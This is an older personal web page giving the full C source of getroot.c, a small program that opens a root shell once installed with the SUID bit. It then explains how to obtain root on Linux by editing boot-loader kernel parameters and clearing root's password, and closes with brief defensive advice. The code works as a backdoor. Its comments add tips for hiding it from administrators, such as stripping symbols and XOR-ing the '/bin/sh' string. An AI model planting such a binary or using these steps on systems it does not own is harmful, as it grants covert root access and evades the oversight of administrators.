Note that this program listing exists for informational purposes only.

Starting root shell

The following is a simple program to start root shell properly. Useful with chmod and SUID-bit (as per listing).

/**

 A simple program to start a root shell if setup correctly with the suid
 bit and as root owning this file.
 
 This is an example of how easy it would be (this is nothing magical),
 do not use this to actually implement backdoors.
 
 Copyright 2004 Aleksandr Koltsoff (czr@iki.fi)
 Permission is granted to use this program for what ever you want,
 except to actually implement a backdoor. If you really want to do that,
 you'll need to rewrite the program (which wouldn't be too difficult for
 sure).
 
 Changelog:
 2004-03-10: Initial working version
 2004-03-11: Made html-listing , fixed typos
 

 build with:
 gcc -Os -Wall getroot.c -ogetroot
 strip --strip-unneeded getroot
 
 then, as root:
 chown root.root getroot
 (to switch the owner of the file, so that suid bit will work)
 chmod +s getroot
 (set the suid bit)
 
 the strip will get rid of all unnecessary symbols in the executable so
 that nm -tool cannot be used on it (well it can of course). you could
 also use -s -parameter with gcc in order for it to strip automatically.
 
 if you want a static executable (to make a non dynamic executable, no
 .so dependencies), add a flag -static to the gcc command. this will
 enlarge your executable somewhat (a lot in fact). then the tool can
 be used even if shared libraries on your system don't work for some reason.
 
 the administrator can still use the strings -tool to search for ascii
 strings in your executable (you should try it). they will see the
 "/bin/sh" part. There are techniques (simple ones) with which you
 can also hide this string (XOR-ring the string with 0xAA for example).
 
 bash (the default shell), will drop root-privileges if attempted
 to start trough suid bit on the executable by non-root user (it's a
 security feature). this is why we need to make our own program.
 
 by the way, since we're using execvp, you can execute another
 program via the root shell like this:
 ./getroot -c id
 
 see manual page for sh for info about the -c parameter.
 
 */
 

#include <unistd.h>	/* setuid, .. */
#include <sys/types.h>	/* setuid, .. */
#include <grp.h>	/* setgroups */
#include <stdio.h>	/* perror */

int main (int argc, char** argv) {

  gid_t newGrp = 0;

  /**
    if you installed programming manual pages, you can get the
    man page for execve 'man execvp'. Same goes for all the
    other system calls that we're using here.
   */

  /* this will tattoo the suid bit so that bash won't see that
     we're not really root. we also drop all other memberships
     just in case we're running with PAGs (in AFS) */
  if (setuid(0) != 0) {
    perror("Setuid failed, no suid-bit set?");
    return 1;
  }
  setgid(0);
  seteuid(0);
  setegid(0);
  /* we also drop all the groups that the old user had
     (verify with id -tool afterwards)
     this is not strictly necessary but we want to get rid of the
     groups that the original user was part of. */
  setgroups(1, &newGrp);
  
  /* load the default shell on top of this program
     to exit from the shell, use 'exit' :-) */
  execvp("/bin/sh", argv); 

  return 0;
}

[ Listing of getroot.c ]

Getting root on Linux

If Linux has been installed with default settings the boot manager should let you append kernel parameters. On RHEL-based systems appending 1 to the end of kernel command line will cause init to start into runlevel 1 directly without asking for root password. You can then use passwd to give the new root password.

For Ubuntu/Knoppix, this is a bit more involved as root account is locked and it asks for root password on runlevel 1 boot. You can always experiment with appending init=bin/sh to the boot loader. In this case the kernel will start a root shell directly without init. Note that your keyboard map will be the default US-map and also no filesystems will be mounted properly (you might want to change the ro kernel parameter into rw for this). Remember to sync couple of times after clearing the root password. It's enough to clear the password column the /etc/passwd line for root. Then reboot and login as root and use passwd to enter a new password and check whether /etc/passwd is updated with the x (not all systems do this, instead just setting the password in /etc/shadow, which won't be consulted if the password field in /etc/passwd is empty).

Needless to say, this is risky area and you should really know what you're doing.

To protect your system against this: password protect your boot manager and disable booting over anything else than your boot hard disk (this includes disabling PXE). You should also password protect your BIOS and hope that no factory passwords exist for your BIOS ("well-known" backdoor passwords). The proper protection against this is actually running your system with encrypted hard disks or storage, but that is beyond the scope of this document.

The other approach is to move all your data off the computer to network and use some encrypted communication with the file server. This way you'll need to authenticate before using your computer, but this model is mostly suited for light-weight network computing environments.

Download file(s)

No guarantees are given that the programs/scripts work or do the intended thing. getroot.c

Epilog

All content copyright 2003, 2006 Aleksandr Koltsoff (including program sources). Use for personal education permitted, all other use must be negotiated (czr(at)iki(dot)fi).